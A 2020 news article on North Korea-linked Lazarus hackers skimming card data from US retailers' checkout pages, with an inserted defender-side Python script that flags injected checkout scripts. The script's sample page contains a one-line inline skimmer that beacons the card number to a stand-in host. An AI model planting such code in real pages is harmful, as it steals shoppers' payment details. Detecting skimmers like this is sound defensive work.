08 Jul 2020
Hackers with suspected ties to the North Korean regime are intercepting and stealing U.S. shoppers’ credit card details during online payments.
Cybercriminals with links to a state-sponsored unit known as “Hidden Cobra” have been breaking into the websites of “large U.S retailers” and planting “skimmers” since at least May 2019, according to research released today by security firm Sansec.
Skimming is the interception of details during online purchases, and is often referred to as a “magecart” attack. The process involves injecting malicious code into the store’s checkout page—directly or via third-party providers—then lurking for victims.
In this instance, Hidden Cobra’s hackers were targeting card numbers being processed as customers were making online orders, exfiltrating data to hijacked servers and likely selling the information for illicit profit on dark web markets, Sansec said.
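A defender-side check for the injected-skimmer pattern described above, added here as an example (it is not code from Sansec's report or from any of the retailers named): it inventories the scripts on a checkout page and flags external scripts loaded from hosts outside the store's allowlist, plus inline scripts that both read payment fields and reference such a host. The allowlist, hostnames and checkout HTML are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist: the store's own origin plus its payment provider.
ALLOWED_HOSTS = {"shop.example", "checkout.payments.example"}
PAYMENT_FIELD_RE = re.compile(r"card|cvv|cvc|expir", re.I)  # fields a skimmer reads
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")

class ScriptInventory(HTMLParser):
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False
    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:  # inline script: start collecting its text
            self._in_script = True
            self.inline.append("")
    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
    def handle_data(self, data):
        if self._in_script:
            self.inline[-1] += data

def find_suspicious_scripts(html, allowed_hosts=ALLOWED_HOSTS):
    """Return (reason, host) pairs for scripts the store operator did not approve."""
    inv = ScriptInventory()
    inv.feed(html)
    findings = []
    for src in inv.external:
        host = urlparse(src).hostname  # None for same-origin relative paths
        if host and host not in allowed_hosts:
            findings.append(("external script from unapproved host", host))
    for body in inv.inline:
        foreign = sorted({h for h in HOST_RE.findall(body) if h not in allowed_hosts})
        if foreign and PAYMENT_FIELD_RE.search(body):
            findings.append(("inline script reads payment fields and contacts unapproved host", foreign[0]))
    return findings

SAMPLE_CHECKOUT = """<html><body><input id="card_number"><input id="cvv">
<script src="https://checkout.payments.example/sdk.js"></script>
<script>document.forms[0].onsubmit = function () { navigator.sendBeacon(
  "https://cdn-stats.invalid/c", document.getElementById("card_number").value); };</script>
</body></html>"""  # constructed page: one approved provider script, one injected inline snippet
```

Run `find_suspicious_scripts(SAMPLE_CHECKOUT)` against each deployed checkout template on a schedule and alert on any non-empty result; relative `src` paths are treated as same-origin and skipped.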
Some legitimate websites being exploited to “harvest” payment data included an Italian modeling agency and a family-run book store located in the state of New Jersey.
The researchers identified multiple targets of the campaign, including the fashion chain Claire’s, as well as businesses called Paper Source and Focus Camera.
“This… fraud has been growing since 2015 and was traditionally dominated by Russian and Indonesian-speaking hacker groups. This is no longer the case, as the criminals now face competition from their North Korean counterparts,” Sansec said.
Hidden Cobra, which is also known as the Lazarus Group, has been active since at least 2009, industry analysis suggests. One fork of the state-backed hacking unit, often called Bluenoroff, is believed to be solely dedicated to financial crime.
In its report released today, Sansec said its team attributed activity to Hidden Cobra because the hackers reused infrastructure from previous hacking operations. Research found “distinctive patterns in the malware code” as further evidence, it noted.
A full list of victimized organizations has not been made public.
Hackers aligned with the group—commonly referred to as an advanced persistent threat (APT)—have been tied to a series of criminal heists in recent years, including the 2014 Sony Pictures hack and the “WannaCry” ransomware outbreak in 2017.
North Korea appeared linked to the infiltration of the Bangladesh central bank in 2016 in which hackers stole $81 million by tampering with the SWIFT network. In recent years, Hidden Cobra has had cryptocurrencies and bitcoin in its crosshairs, experts say.
By Jason Murdock, Newsweek, 6 July 2020